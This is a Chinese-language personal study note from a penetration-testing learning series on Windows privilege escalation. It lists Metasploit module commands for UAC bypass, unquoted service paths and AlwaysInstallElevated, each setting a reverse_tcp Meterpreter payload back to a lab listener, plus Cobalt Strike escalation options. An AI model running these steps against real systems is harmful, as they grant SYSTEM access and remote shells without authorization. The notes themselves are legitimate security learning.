Windows系统提权 — msf&CS的使用|内网渗透学习(八)

Windows系统提权 -- msf&CS的使用|内网渗透学习(八)

这部分内容其实不多, 但是晚上精力很分散所以效率很低, msf部分的内容主要就是三个示例, cs部分由于大多数是之前用过的而且较晚了所以就不详细写了, 简单记一下有哪些使用方法.

今天算是查点大摆了,浪费了半天的时间,,,

Meterpreter

Meterpreter自动提权命令:

  1. getsystem (提权命令)
  2. getuid (查看当前用户)

条件: 需要当前用户为administrators管理员用户组的权限才能成功提权到system

bypassuac/bypassuac_injection 模块

use exploit/windows/local/bypassuac
set payload payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.92.128
set lport 6666
set session [当前已有的session会话id]
exploit

运行之后就会新增一个session, 这个shell也还是一个原本的session一样的用户权限, 但是可以直接执行getsystem就可以直接绕过UAC的检测完成system提权

另外exploit/windows/local/bypassuac_injection 模块的使用方法和上面的bypassuac模块使用方法是一样的,直接该一个模块名就行, 但是原理是有所差别的

use exploit/windows/local/bypassuac_injection
set payload payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.92.128
set lport 6666
set session [当前已有的session会话id]
exploit

注意使用的端口不要和session会话中的端口一样, 不然的话可能会出现冲突

unquoted_service_path 模块

这个模块的原理其实就是之前的Windows系统服务漏洞, unquoted就是没有对服务路径添加引号的意思

image-20220930230346606

use windows/local/unquoted_service_path
set payload payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.92.128
set lport 4444
set session [当前已有的session会话id]
set QUICK false
exploit -j

注意使用的端口不要和session会话中的端口一样, 不然的话可能会出现冲突

因为我这里的虚拟机都是默认环境的,并没有这个漏洞,所以执行失败了

image-20221001001349910

always_install_elevated 模块

这个模块对应的是Always Install Elevated(msi安装策略)漏洞原理,

use exploit/windows/local/always_install_elevated 
set lhost 192.168.92.128
set lport 4444
set session [当前已有的session会话id]

这里因为默认是不打开Always Install Elevated策略的, 所以执行都失败了

image-20221001001950772

CS的使用

cs这部分并不想多说, 因为个人来说使用cs进行提权都是之前我用过不少的内容, 学习视频讲解到的基本都是之前有用过的, 所以就简单说一下有哪些提权的方法可以使用:

  1. 会话的Interact执行powershell-importpowershell命令加载ps脚本
  2. 上传提权exp文件执行,例如CVE-2019-0803.exe
  3. 会话的Access -> Elevate使用自带的提权脚本
  4. CobaltStrike -> ScriptManager添加从github等下载的cs提权脚本项目
  5. cs和msf联动, 这个之前一起用过,后面学了再说吧

powershell

可以在cs的session会话中的Interact直接执行命令:

powershell-import [.ps1脚本路径]
powershell [.ps1中定义的功能函数]

powershell-import会执行powershell环境中的import-module方法

image-20221001035507907

2022_10_01 04:00

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇